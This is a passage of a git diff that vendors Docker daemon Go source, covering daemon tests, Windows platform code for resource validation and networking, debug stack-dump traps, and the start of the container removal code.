+	if err := parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected parseSecurityOpt error: %v", err)
+	}
+	if container.SeccompProfile != sp {
+		t.Fatalf("Unexpected SeccompProfile, expected: %q, got %q", sp, container.SeccompProfile)
+	}
+
+	// test valid label
+	config.SecurityOpt = []string{"label=user:USER"}
+	if err := parseSecurityOpt(container, config); err != nil {
+		t.Fatalf("Unexpected parseSecurityOpt error: %v", err)
+	}
+
+	// test invalid label
+	config.SecurityOpt = []string{"label"}
+	if err := parseSecurityOpt(container, config); err == nil {
+		t.Fatal("Expected parseSecurityOpt error, got nil")
+	}
+
+	// test invalid opt
+	config.SecurityOpt = []string{"test"}
+	if err := parseSecurityOpt(container, config); err == nil {
+		t.Fatal("Expected parseSecurityOpt error, got nil")
+	}
+}
+
+func TestNetworkOptions(t *testing.T) {
+	daemon := &Daemon{}
+	dconfigCorrect := &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore:     "consul://localhost:8500",
+			ClusterAdvertise: "192.168.0.1:8000",
+		},
+	}
+
+	if _, err := daemon.networkOptions(dconfigCorrect, nil, nil); err != nil {
+		t.Fatalf("Expect networkOptions success, got error: %v", err)
+	}
+
+	dconfigWrong := &Config{
+		CommonConfig: CommonConfig{
+			ClusterStore: "consul://localhost:8500://test://bbb",
+		},
+	}
+
+	if _, err := daemon.networkOptions(dconfigWrong, nil, nil); err == nil {
+		t.Fatalf("Expected networkOptions error, got nil")
+	}
+}
+
+func TestMigratePre17Volumes(t *testing.T) {
+	rootDir, err := ioutil.TempDir("", "test-daemon-volumes")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(rootDir)
+
+	volumeRoot := filepath.Join(rootDir, "volumes")
+	err = os.MkdirAll(volumeRoot, 0755)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	containerRoot := filepath.Join(rootDir, "containers")
+	cid := "1234"
+	err = os.MkdirAll(filepath.Join(containerRoot, cid), 0755)
+
+	vid := "5678"
+	vfsPath := filepath.Join(rootDir, "vfs", "dir", vid)
+	err = os.MkdirAll(vfsPath, 0755)
+	if err != nil {
+		t.Fatal(err)
+	}
+
+	config := []byte(`
+		{
+			"ID": "` + cid + `",
+			"Volumes": {
+				"/foo": "` + vfsPath + `",
+				"/bar": "/foo",
+				"/quux": "/quux"
+			},
+			"VolumesRW": {
+				"/foo": true,
+				"/bar": true,
+				"/quux": false
+			}
+		}
+	`)
+
+	volStore, err := store.New(volumeRoot)
+	if err != nil {
+		t.Fatal(err)
+	}
+	drv, err := local.New(volumeRoot, 0, 0)
+	if err != nil {
+		t.Fatal(err)
+	}
+	volumedrivers.Register(drv, volume.DefaultDriverName)
+
+	daemon := &Daemon{root: rootDir, repository: containerRoot, volumes: volStore}
+	err = ioutil.WriteFile(filepath.Join(containerRoot, cid, "config.v2.json"), config, 600)
+	if err != nil {
+		t.Fatal(err)
+	}
+	c, err := daemon.load(cid)
+	if err != nil {
+		t.Fatal(err)
+	}
+	if err := daemon.verifyVolumesInfo(c); err != nil {
+		t.Fatal(err)
+	}
+
+	expected := map[string]volume.MountPoint{
+		"/foo":  {Destination: "/foo", RW: true, Name: vid},
+		"/bar":  {Source: "/foo", Destination: "/bar", RW: true},
+		"/quux": {Source: "/quux", Destination: "/quux", RW: false},
+	}
+	for id, mp := range c.MountPoints {
+		x, exists := expected[id]
+		if !exists {
+			t.Fatal("volume not migrated")
+		}
+		if mp.Source != x.Source || mp.Destination != x.Destination || mp.RW != x.RW || mp.Name != x.Name {
+			t.Fatalf("got unexpected mountpoint, expected: %+v, got: %+v", x, mp)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/daemon/daemon_unsupported.go b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go
new file mode 100644
index 0000000000..cb1acf63d6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_unsupported.go
@@ -0,0 +1,5 @@
+// +build !linux,!freebsd,!windows,!solaris
+
+package daemon
+
+const platformSupported = false
diff --git a/vendor/github.com/docker/docker/daemon/daemon_windows.go b/vendor/github.com/docker/docker/daemon/daemon_windows.go
new file mode 100644
index 0000000000..51ad68b357
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/daemon_windows.go
@@ -0,0 +1,604 @@
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"strings"
+
+	"github.com/Microsoft/hcsshim"
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/image"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/parsers"
+	"github.com/docker/docker/pkg/platform"
+	"github.com/docker/docker/pkg/sysinfo"
+	"github.com/docker/docker/pkg/system"
+	"github.com/docker/docker/runconfig"
+	"github.com/docker/libnetwork"
+	nwconfig "github.com/docker/libnetwork/config"
+	"github.com/docker/libnetwork/datastore"
+	winlibnetwork "github.com/docker/libnetwork/drivers/windows"
+	"github.com/docker/libnetwork/netlabel"
+	"github.com/docker/libnetwork/options"
+	blkiodev "github.com/opencontainers/runc/libcontainer/configs"
+	"golang.org/x/sys/windows"
+)
+
+const (
+	defaultNetworkSpace  = "172.16.0.0/12"
+	platformSupported    = true
+	windowsMinCPUShares  = 1
+	windowsMaxCPUShares  = 10000
+	windowsMinCPUPercent = 1
+	windowsMaxCPUPercent = 100
+	windowsMinCPUCount   = 1
+)
+
+func getBlkioWeightDevices(config *containertypes.HostConfig) ([]blkiodev.WeightDevice, error) {
+	return nil, nil
+}
+
+func parseSecurityOpt(container *container.Container, config *containertypes.HostConfig) error {
+	return nil
+}
+
+func getBlkioReadIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
+	return nil, nil
+}
+
+func getBlkioWriteIOpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
+	return nil, nil
+}
+
+func getBlkioReadBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
+	return nil, nil
+}
+
+func getBlkioWriteBpsDevices(config *containertypes.HostConfig) ([]blkiodev.ThrottleDevice, error) {
+	return nil, nil
+}
+
+func (daemon *Daemon) getLayerInit() func(string) error {
+	return nil
+}
+
+func checkKernel() error {
+	return nil
+}
+
+func (daemon *Daemon) getCgroupDriver() string {
+	return ""
+}
+
+// adaptContainerSettings is called during container creation to modify any
+// settings necessary in the HostConfig structure.
+func (daemon *Daemon) adaptContainerSettings(hostConfig *containertypes.HostConfig, adjustCPUShares bool) error {
+	if hostConfig == nil {
+		return nil
+	}
+
+	return nil
+}
+
+func verifyContainerResources(resources *containertypes.Resources, isHyperv bool) ([]string, error) {
+	warnings := []string{}
+
+	if !isHyperv {
+		// The processor resource controls are mutually exclusive on
+		// Windows Server Containers, the order of precedence is
+		// CPUCount first, then CPUShares, and CPUPercent last.
+		if resources.CPUCount > 0 {
+			if resources.CPUShares > 0 {
+				warnings = append(warnings, "Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded")
+				logrus.Warn("Conflicting options: CPU count takes priority over CPU shares on Windows Server Containers. CPU shares discarded")
+				resources.CPUShares = 0
+			}
+			if resources.CPUPercent > 0 {
+				warnings = append(warnings, "Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. CPU percent discarded")
+				logrus.Warn("Conflicting options: CPU count takes priority over CPU percent on Windows Server Containers. CPU percent discarded")
+				resources.CPUPercent = 0
+			}
+		} else if resources.CPUShares > 0 {
+			if resources.CPUPercent > 0 {
+				warnings = append(warnings, "Conflicting options: CPU shares takes priority over CPU percent on Windows Server Containers. CPU percent discarded")
+				logrus.Warn("Conflicting options: CPU shares takes priority over CPU percent on Windows Server Containers. CPU percent discarded")
+				resources.CPUPercent = 0
+			}
+		}
+	}
+
+	if resources.CPUShares < 0 || resources.CPUShares > windowsMaxCPUShares {
+		return warnings, fmt.Errorf("range of CPUShares is from %d to %d", windowsMinCPUShares, windowsMaxCPUShares)
+	}
+	if resources.CPUPercent < 0 || resources.CPUPercent > windowsMaxCPUPercent {
+		return warnings, fmt.Errorf("range of CPUPercent is from %d to %d", windowsMinCPUPercent, windowsMaxCPUPercent)
+	}
+	if resources.CPUCount < 0 {
+		return warnings, fmt.Errorf("invalid CPUCount: CPUCount cannot be negative")
+	}
+
+	if resources.NanoCPUs > 0 && resources.CPUPercent > 0 {
+		return warnings, fmt.Errorf("conflicting options: Nano CPUs and CPU Percent cannot both be set")
+	}
+	if resources.NanoCPUs > 0 && resources.CPUShares > 0 {
+		return warnings, fmt.Errorf("conflicting options: Nano CPUs and CPU Shares cannot both be set")
+	}
+	// The precision we could get is 0.01, because on Windows we have to convert to CPUPercent.
+	// We don't set the lower limit here and it is up to the underlying platform (e.g., Windows) to return an error.
+	if resources.NanoCPUs < 0 || resources.NanoCPUs > int64(sysinfo.NumCPU())*1e9 {
+		return warnings, fmt.Errorf("range of CPUs is from 0.01 to %d.00, as there are only %d CPUs available", sysinfo.NumCPU(), sysinfo.NumCPU())
+	}
+
+	if len(resources.BlkioDeviceReadBps) > 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadBps")
+	}
+	if len(resources.BlkioDeviceReadIOps) > 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceReadIOps")
+	}
+	if len(resources.BlkioDeviceWriteBps) > 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceWriteBps")
+	}
+	if len(resources.BlkioDeviceWriteIOps) > 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support BlkioDeviceWriteIOps")
+	}
+	if resources.BlkioWeight > 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support BlkioWeight")
+	}
+	if len(resources.BlkioWeightDevice) > 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support BlkioWeightDevice")
+	}
+	if resources.CgroupParent != "" {
+		return warnings, fmt.Errorf("invalid option: Windows does not support CgroupParent")
+	}
+	if resources.CPUPeriod != 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support CPUPeriod")
+	}
+	if resources.CpusetCpus != "" {
+		return warnings, fmt.Errorf("invalid option: Windows does not support CpusetCpus")
+	}
+	if resources.CpusetMems != "" {
+		return warnings, fmt.Errorf("invalid option: Windows does not support CpusetMems")
+	}
+	if resources.KernelMemory != 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support KernelMemory")
+	}
+	if resources.MemoryReservation != 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support MemoryReservation")
+	}
+	if resources.MemorySwap != 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwap")
+	}
+	if resources.MemorySwappiness != nil && *resources.MemorySwappiness != -1 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support MemorySwappiness")
+	}
+	if resources.OomKillDisable != nil && *resources.OomKillDisable {
+		return warnings, fmt.Errorf("invalid option: Windows does not support OomKillDisable")
+	}
+	if resources.PidsLimit != 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support PidsLimit")
+	}
+	if len(resources.Ulimits) != 0 {
+		return warnings, fmt.Errorf("invalid option: Windows does not support Ulimits")
+	}
+	return warnings, nil
+}
+
+// verifyPlatformContainerSettings performs platform-specific validation of the
+// hostconfig and config structures.
+func verifyPlatformContainerSettings(daemon *Daemon, hostConfig *containertypes.HostConfig, config *containertypes.Config, update bool) ([]string, error) {
+	warnings := []string{}
+
+	hyperv := daemon.runAsHyperVContainer(hostConfig)
+	if !hyperv && system.IsWindowsClient() {
+		// @engine maintainers. This block should not be removed. It partially enforces licensing
+		// restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this.
+		return warnings, fmt.Errorf("Windows client operating systems only support Hyper-V containers")
+	}
+
+	w, err := verifyContainerResources(&hostConfig.Resources, hyperv)
+	warnings = append(warnings, w...)
+	if err != nil {
+		return warnings, err
+	}
+	return warnings, nil
+}
+
+// platformReload update configuration with platform specific options
+func (daemon *Daemon) platformReload(config *Config) map[string]string {
+	return map[string]string{}
+}
+
+// verifyDaemonSettings performs validation of daemon config struct
+func verifyDaemonSettings(config *Config) error {
+	return nil
+}
+
+// checkSystem validates platform-specific requirements
+func checkSystem() error {
+	// Validate the OS version. Note that docker.exe must be manifested for this
+	// call to return the correct version.
+	osv := system.GetOSVersion()
+	if osv.MajorVersion < 10 {
+		return fmt.Errorf("This version of Windows does not support the docker daemon")
+	}
+	if osv.Build < 14393 {
+		return fmt.Errorf("The docker daemon requires build 14393 or later of Windows Server 2016 or Windows 10")
+	}
+
+	vmcompute := windows.NewLazySystemDLL("vmcompute.dll")
+	if vmcompute.Load() != nil {
+		return fmt.Errorf("Failed to load vmcompute.dll. Ensure that the Containers role is installed.")
+	}
+	return nil
+}
+
+// configureKernelSecuritySupport configures and validate security support for the kernel
+func configureKernelSecuritySupport(config *Config, driverName string) error {
+	return nil
+}
+
+// configureMaxThreads sets the Go runtime max threads threshold
+func configureMaxThreads(config *Config) error {
+	return nil
+}
+
+func (daemon *Daemon) initNetworkController(config *Config, activeSandboxes map[string]interface{}) (libnetwork.NetworkController, error) {
+	netOptions, err := daemon.networkOptions(config, nil, nil)
+	if err != nil {
+		return nil, err
+	}
+	controller, err := libnetwork.New(netOptions...)
+	if err != nil {
+		return nil, fmt.Errorf("error obtaining controller instance: %v", err)
+	}
+
+	hnsresponse, err := hcsshim.HNSListNetworkRequest("GET", "", "")
+	if err != nil {
+		return nil, err
+	}
+
+	// Remove networks not present in HNS
+	for _, v := range controller.Networks() {
+		options := v.Info().DriverOptions()
+		hnsid := options[winlibnetwork.HNSID]
+		found := false
+
+		for _, v := range hnsresponse {
+			if v.Id == hnsid {
+				found = true
+				break
+			}
+		}
+
+		if !found {
+			// global networks should not be deleted by local HNS
+			if v.Info().Scope() != datastore.GlobalScope {
+				err = v.Delete()
+				if err != nil {
+					logrus.Errorf("Error occurred when removing network %v", err)
+				}
+			}
+		}
+	}
+
+	_, err = controller.NewNetwork("null", "none", "", libnetwork.NetworkOptionPersist(false))
+	if err != nil {
+		return nil, err
+	}
+
+	defaultNetworkExists := false
+
+	if network, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil {
+		options := network.Info().DriverOptions()
+		for _, v := range hnsresponse {
+			if options[winlibnetwork.HNSID] == v.Id {
+				defaultNetworkExists = true
+				break
+			}
+		}
+	}
+
+	// discover and add HNS networks to windows
+	// network that exist are removed and added again
+	for _, v := range hnsresponse {
+		var n libnetwork.Network
+		s := func(current libnetwork.Network) bool {
+			options := current.Info().DriverOptions()
+			if options[winlibnetwork.HNSID] == v.Id {
+				n = current
+				return true
+			}
+			return false
+		}
+
+		controller.WalkNetworks(s)
+		if n != nil {
+			// global networks should not be deleted by local HNS
+			if n.Info().Scope() == datastore.GlobalScope {
+				continue
+			}
+			v.Name = n.Name()
+			// This will not cause network delete from HNS as the network
+			// is not yet populated in the libnetwork windows driver
+			n.Delete()
+		}
+
+		netOption := map[string]string{
+			winlibnetwork.NetworkName: v.Name,
+			winlibnetwork.HNSID:       v.Id,
+		}
+
+		v4Conf := []*libnetwork.IpamConf{}
+		for _, subnet := range v.Subnets {
+			ipamV4Conf := libnetwork.IpamConf{}
+			ipamV4Conf.PreferredPool = subnet.AddressPrefix
+			ipamV4Conf.Gateway = subnet.GatewayAddress
+			v4Conf = append(v4Conf, &ipamV4Conf)
+		}
+
+		name := v.Name
+
+		// If there is no nat network create one from the first NAT network
+		// encountered
+		if !defaultNetworkExists && runconfig.DefaultDaemonNetworkMode() == containertypes.NetworkMode(strings.ToLower(v.Type)) {
+			name = runconfig.DefaultDaemonNetworkMode().NetworkName()
+			defaultNetworkExists = true
+		}
+
+		v6Conf := []*libnetwork.IpamConf{}
+		_, err := controller.NewNetwork(strings.ToLower(v.Type), name, "",
+			libnetwork.NetworkOptionGeneric(options.Generic{
+				netlabel.GenericData: netOption,
+			}),
+			libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil),
+		)
+
+		if err != nil {
+			logrus.Errorf("Error occurred when creating network %v", err)
+		}
+	}
+
+	if !config.DisableBridge {
+		// Initialize default driver "bridge"
+		if err := initBridgeDriver(controller, config); err != nil {
+			return nil, err
+		}
+	}
+
+	return controller, nil
+}
+
+func initBridgeDriver(controller libnetwork.NetworkController, config *Config) error {
+	if _, err := controller.NetworkByName(runconfig.DefaultDaemonNetworkMode().NetworkName()); err == nil {
+		return nil
+	}
+
+	netOption := map[string]string{
+		winlibnetwork.NetworkName: runconfig.DefaultDaemonNetworkMode().NetworkName(),
+	}
+
+	var ipamOption libnetwork.NetworkOption
+	var subnetPrefix string
+
+	if config.bridgeConfig.FixedCIDR != "" {
+		subnetPrefix = config.bridgeConfig.FixedCIDR
+	} else {
+		// TP5 doesn't support properly detecting subnet
+		osv := system.GetOSVersion()
+		if osv.Build < 14360 {
+			subnetPrefix = defaultNetworkSpace
+		}
+	}
+
+	if subnetPrefix != "" {
+		ipamV4Conf := libnetwork.IpamConf{}
+		ipamV4Conf.PreferredPool = subnetPrefix
+		v4Conf := []*libnetwork.IpamConf{&ipamV4Conf}
+		v6Conf := []*libnetwork.IpamConf{}
+		ipamOption = libnetwork.NetworkOptionIpam("default", "", v4Conf, v6Conf, nil)
+	}
+
+	_, err := controller.NewNetwork(string(runconfig.DefaultDaemonNetworkMode()), runconfig.DefaultDaemonNetworkMode().NetworkName(), "",
+		libnetwork.NetworkOptionGeneric(options.Generic{
+			netlabel.GenericData: netOption,
+		}),
+		ipamOption,
+	)
+
+	if err != nil {
+		return fmt.Errorf("Error creating default network: %v", err)
+	}
+
+	return nil
+}
+
+// registerLinks sets up links between containers and writes the
+// configuration out for persistence. As of Windows TP4, links are not supported.
+func (daemon *Daemon) registerLinks(container *container.Container, hostConfig *containertypes.HostConfig) error {
+	return nil
+}
+
+func (daemon *Daemon) cleanupMountsByID(in string) error {
+	return nil
+}
+
+func (daemon *Daemon) cleanupMounts() error {
+	return nil
+}
+
+func setupRemappedRoot(config *Config) ([]idtools.IDMap, []idtools.IDMap, error) {
+	return nil, nil, nil
+}
+
+func setupDaemonRoot(config *Config, rootDir string, rootUID, rootGID int) error {
+	config.Root = rootDir
+	// Create the root directory if it doesn't exists
+	if err := system.MkdirAllWithACL(config.Root, 0); err != nil && !os.IsExist(err) {
+		return err
+	}
+	return nil
+}
+
+// runasHyperVContainer returns true if we are going to run as a Hyper-V container
+func (daemon *Daemon) runAsHyperVContainer(hostConfig *containertypes.HostConfig) bool {
+	if hostConfig.Isolation.IsDefault() {
+		// Container is set to use the default, so take the default from the daemon configuration
+		return daemon.defaultIsolation.IsHyperV()
+	}
+
+	// Container is requesting an isolation mode. Honour it.
+	return hostConfig.Isolation.IsHyperV()
+
+}
+
+// conditionalMountOnStart is a platform specific helper function during the
+// container start to call mount.
+func (daemon *Daemon) conditionalMountOnStart(container *container.Container) error {
+	// We do not mount if a Hyper-V container
+	if !daemon.runAsHyperVContainer(container.HostConfig) {
+		return daemon.Mount(container)
+	}
+	return nil
+}
+
+// conditionalUnmountOnCleanup is a platform specific helper function called
+// during the cleanup of a container to unmount.
+func (daemon *Daemon) conditionalUnmountOnCleanup(container *container.Container) error {
+	// We do not unmount if a Hyper-V container
+	if !daemon.runAsHyperVContainer(container.HostConfig) {
+		return daemon.Unmount(container)
+	}
+	return nil
+}
+
+func driverOptions(config *Config) []nwconfig.Option {
+	return []nwconfig.Option{}
+}
+
+func (daemon *Daemon) stats(c *container.Container) (*types.StatsJSON, error) {
+	if !c.IsRunning() {
+		return nil, errNotRunning{c.ID}
+	}
+
+	// Obtain the stats from HCS via libcontainerd
+	stats, err := daemon.containerd.Stats(c.ID)
+	if err != nil {
+		return nil, err
+	}
+
+	// Start with an empty structure
+	s := &types.StatsJSON{}
+
+	// Populate the CPU/processor statistics
+	s.CPUStats = types.CPUStats{
+		CPUUsage: types.CPUUsage{
+			TotalUsage:        stats.Processor.TotalRuntime100ns,
+			UsageInKernelmode: stats.Processor.RuntimeKernel100ns,
+			UsageInUsermode:   stats.Processor.RuntimeKernel100ns,
+		},
+	}
+
+	// Populate the memory statistics
+	s.MemoryStats = types.MemoryStats{
+		Commit:            stats.Memory.UsageCommitBytes,
+		CommitPeak:        stats.Memory.UsageCommitPeakBytes,
+		PrivateWorkingSet: stats.Memory.UsagePrivateWorkingSetBytes,
+	}
+
+	// Populate the storage statistics
+	s.StorageStats = types.StorageStats{
+		ReadCountNormalized:  stats.Storage.ReadCountNormalized,
+		ReadSizeBytes:        stats.Storage.ReadSizeBytes,
+		WriteCountNormalized: stats.Storage.WriteCountNormalized,
+		WriteSizeBytes:       stats.Storage.WriteSizeBytes,
+	}
+
+	// Populate the network statistics
+	s.Networks = make(map[string]types.NetworkStats)
+
+	for _, nstats := range stats.Network {
+		s.Networks[nstats.EndpointId] = types.NetworkStats{
+			RxBytes:   nstats.BytesReceived,
+			RxPackets: nstats.PacketsReceived,
+			RxDropped: nstats.DroppedPacketsIncoming,
+			TxBytes:   nstats.BytesSent,
+			TxPackets: nstats.PacketsSent,
+			TxDropped: nstats.DroppedPacketsOutgoing,
+		}
+	}
+
+	// Set the timestamp
+	s.Stats.Read = stats.Timestamp
+	s.Stats.NumProcs = platform.NumProcs()
+
+	return s, nil
+}
+
+// setDefaultIsolation determine the default isolation mode for the
+// daemon to run in. This is only applicable on Windows
+func (daemon *Daemon) setDefaultIsolation() error {
+	daemon.defaultIsolation = containertypes.Isolation("process")
+	// On client SKUs, default to Hyper-V
+	if system.IsWindowsClient() {
+		daemon.defaultIsolation = containertypes.Isolation("hyperv")
+	}
+	for _, option := range daemon.configStore.ExecOptions {
+		key, val, err := parsers.ParseKeyValueOpt(option)
+		if err != nil {
+			return err
+		}
+		key = strings.ToLower(key)
+		switch key {
+
+		case "isolation":
+			if !containertypes.Isolation(val).IsValid() {
+				return fmt.Errorf("Invalid exec-opt value for 'isolation':'%s'", val)
+			}
+			if containertypes.Isolation(val).IsHyperV() {
+				daemon.defaultIsolation = containertypes.Isolation("hyperv")
+			}
+			if containertypes.Isolation(val).IsProcess() {
+				if system.IsWindowsClient() {
+					// @engine maintainers. This block should not be removed. It partially enforces licensing
+					// restrictions on Windows. Ping @jhowardmsft if there are concerns or PRs to change this.
+					return fmt.Errorf("Windows client operating systems only support Hyper-V containers")
+				}
+				daemon.defaultIsolation = containertypes.Isolation("process")
+			}
+		default:
+			return fmt.Errorf("Unrecognised exec-opt '%s'\n", key)
+		}
+	}
+
+	logrus.Infof("Windows default isolation mode: %s", daemon.defaultIsolation)
+	return nil
+}
+
+func rootFSToAPIType(rootfs *image.RootFS) types.RootFS {
+	var layers []string
+	for _, l := range rootfs.DiffIDs {
+		layers = append(layers, l.String())
+	}
+	return types.RootFS{
+		Type:   rootfs.Type,
+		Layers: layers,
+	}
+}
+
+func setupDaemonProcess(config *Config) error {
+	return nil
+}
+
+// verifyVolumesInfo is a no-op on windows.
+// This is called during daemon initialization to migrate volumes from pre-1.7.
+// volumes were not supported on windows pre-1.7
+func (daemon *Daemon) verifyVolumesInfo(container *container.Container) error {
+	return nil
+}
+
+func (daemon *Daemon) setupSeccompProfile() error {
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap.go b/vendor/github.com/docker/docker/daemon/debugtrap.go
new file mode 100644
index 0000000000..209048b589
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/debugtrap.go
@@ -0,0 +1,62 @@
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"time"
+
+	"github.com/davecgh/go-spew/spew"
+	"github.com/pkg/errors"
+)
+
+const dataStructuresLogNameTemplate = "daemon-data-%s.log"
+
+// dumpDaemon appends the daemon datastructures into file in dir and returns full path
+// to that file.
+func (d *Daemon) dumpDaemon(dir string) (string, error) {
+	// Ensure we recover from a panic as we are doing this without any locking
+	defer func() {
+		recover()
+	}()
+
+	path := filepath.Join(dir, fmt.Sprintf(dataStructuresLogNameTemplate, strings.Replace(time.Now().Format(time.RFC3339), ":", "", -1)))
+	f, err := os.OpenFile(path, os.O_CREATE|os.O_WRONLY, 0666)
+	if err != nil {
+		return "", errors.Wrap(err, "failed to open file to write the daemon datastructure dump")
+	}
+	defer f.Close()
+
+	dump := struct {
+		containers      interface{}
+		names           interface{}
+		links           interface{}
+		execs           interface{}
+		volumes         interface{}
+		images          interface{}
+		layers          interface{}
+		imageReferences interface{}
+		downloads       interface{}
+		uploads         interface{}
+		registry        interface{}
+		plugins         interface{}
+	}{
+		containers:      d.containers,
+		execs:           d.execCommands,
+		volumes:         d.volumes,
+		images:          d.imageStore,
+		layers:          d.layerStore,
+		imageReferences: d.referenceStore,
+		downloads:       d.downloadManager,
+		uploads:         d.uploadManager,
+		registry:        d.RegistryService,
+		plugins:         d.PluginStore,
+		names:           d.nameIndex,
+		links:           d.linkIndex,
+	}
+
+	spew.Fdump(f, dump) // Does not return an error
+	f.Sync()
+	return path, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unix.go b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go
new file mode 100644
index 0000000000..d650eb7f8c
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/debugtrap_unix.go
@@ -0,0 +1,33 @@
+// +build !windows
+
+package daemon
+
+import (
+	"os"
+	"os/signal"
+	"syscall"
+
+	"github.com/Sirupsen/logrus"
+	stackdump "github.com/docker/docker/pkg/signal"
+)
+
+func (d *Daemon) setupDumpStackTrap(root string) {
+	c := make(chan os.Signal, 1)
+	signal.Notify(c, syscall.SIGUSR1)
+	go func() {
+		for range c {
+			path, err := stackdump.DumpStacks(root)
+			if err != nil {
+				logrus.WithError(err).Error("failed to write goroutines dump")
+			} else {
+				logrus.Infof("goroutine stacks written to %s", path)
+			}
+			path, err = d.dumpDaemon(root)
+			if err != nil {
+				logrus.WithError(err).Error("failed to write daemon datastructure dump")
+			} else {
+				logrus.Infof("daemon datastructure dump written to %s", path)
+			}
+		}
+	}()
+}
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go
new file mode 100644
index 0000000000..f5b9170907
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/debugtrap_unsupported.go
@@ -0,0 +1,7 @@
+// +build !linux,!darwin,!freebsd,!windows,!solaris
+
+package daemon
+
+func (d *Daemon) setupDumpStackTrap(_ string) {
+	return
+}
diff --git a/vendor/github.com/docker/docker/daemon/debugtrap_windows.go b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go
new file mode 100644
index 0000000000..fb20c9d2c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/debugtrap_windows.go
@@ -0,0 +1,52 @@
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"syscall"
+	"unsafe"
+
+	winio "github.com/Microsoft/go-winio"
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/pkg/signal"
+	"github.com/docker/docker/pkg/system"
+)
+
+func (d *Daemon) setupDumpStackTrap(root string) {
+	// Windows does not support signals like *nix systems. So instead of
+	// trapping on SIGUSR1 to dump stacks, we wait on a Win32 event to be
+	// signaled. ACL'd to builtin administrators and local system
+	ev := "Global\\docker-daemon-" + fmt.Sprint(os.Getpid())
+	sd, err := winio.SddlToSecurityDescriptor("D:P(A;;GA;;;BA)(A;;GA;;;SY)")
+	if err != nil {
+		logrus.Errorf("failed to get security descriptor for debug stackdump event %s: %s", ev, err.Error())
+		return
+	}
+	var sa syscall.SecurityAttributes
+	sa.Length = uint32(unsafe.Sizeof(sa))
+	sa.InheritHandle = 1
+	sa.SecurityDescriptor = uintptr(unsafe.Pointer(&sd[0]))
+	h, err := system.CreateEvent(&sa, false, false, ev)
+	if h == 0 || err != nil {
+		logrus.Errorf("failed to create debug stackdump event %s: %s", ev, err.Error())
+		return
+	}
+	go func() {
+		logrus.Debugf("Stackdump - waiting signal at %s", ev)
+		for {
+			syscall.WaitForSingleObject(h, syscall.INFINITE)
+			path, err := signal.DumpStacks(root)
+			if err != nil {
+				logrus.WithError(err).Error("failed to write goroutines dump")
+			} else {
+				logrus.Infof("goroutine stacks written to %s", path)
+			}
+			path, err = d.dumpDaemon(root)
+			if err != nil {
+				logrus.WithError(err).Error("failed to write daemon datastructure dump")
+			} else {
+				logrus.Infof("daemon datastructure dump written to %s", path)
+			}
+		}
+	}()
+}
diff --git a/vendor/github.com/docker/docker/daemon/delete.go b/vendor/github.com/docker/docker/daemon/delete.go
new file mode 100644
index 0000000000..6b622bde37
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/delete.go
@@ -0,0 +1,168 @@
+package daemon
+
+import (
+	"fmt"
+	"os"
+	"path"
+	"strings"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/errors"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/container"
+	"github.com/docker/docker/layer"
+	volumestore "github.com/docker/docker/volume/store"
+)
+
+// ContainerRm removes the container id from the filesystem. An error
+// is returned if the container is not found, or if the remove
+// fails. If the remove succeeds, the container name is released, and
+// network links are removed.
+func (daemon *Daemon) ContainerRm(name string, config *types.ContainerRmConfig) error {
+	start := time.Now()
+	container, err := daemon.GetContainer(name)
+	if err != nil {
+		return err
+	}
+
+	// Container state RemovalInProgress should be used to avoid races.
+	if inProgress := container.SetRemovalInProgress(); inProgress {
+		err := fmt.Errorf("removal of container %s is already in progress", name)
+		return errors.NewBadRequestError(err)
+	}
+	defer container.ResetRemovalInProgress()
+
+	// check if container wasn't deregistered by previous rm since Get
+	if c := daemon.containers.Get(container.ID); c == nil {
+		return nil
